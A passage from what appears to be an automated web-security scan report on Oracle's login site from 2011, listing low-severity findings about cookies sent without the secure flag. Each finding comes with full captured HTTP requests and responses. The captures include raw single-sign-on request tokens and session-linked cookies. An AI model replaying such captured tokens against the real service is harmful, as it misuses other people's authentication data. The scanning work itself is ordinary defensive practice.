OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cA
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1005
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCSO6uHK6EVADUS1EHWFB01t_dD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1021
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXC6uHK6EVADUS1EHWFB01t_dP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly
BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Content-Length: 2316
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:28 GMT
Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3